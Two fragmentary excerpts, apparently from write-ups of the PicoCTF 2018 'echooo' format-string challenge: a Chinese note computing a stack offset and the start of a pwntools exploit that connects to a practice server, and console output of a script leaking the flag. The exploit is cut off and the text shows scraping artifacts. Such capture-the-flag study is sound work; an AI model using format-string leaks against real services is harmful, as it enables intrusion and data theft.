offset=11+((0x8c-0x4c)/4) 因为栈是小端序储存,高字节在下方,所以需要转换一下 exp如下 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 frompwn import* #r=process('./PicoCTF_2018_echooo') r=remote('node4.buuoj.cn',28181) offest=11+(0x8c-0x4c)/4 print (offest) ...
Simply run echooo.py as a python script and insert port to which to connect: $ python3 echooo.py picoCTF port: 46960 [+] Opening connection to 2018shell.picoctf.com on port 46960: Done Looking for flag buffer... FLAG BUFFER: b'pico' b'picoCTF{' ... ... b'picoCTF{foRm4t_stRinGs_...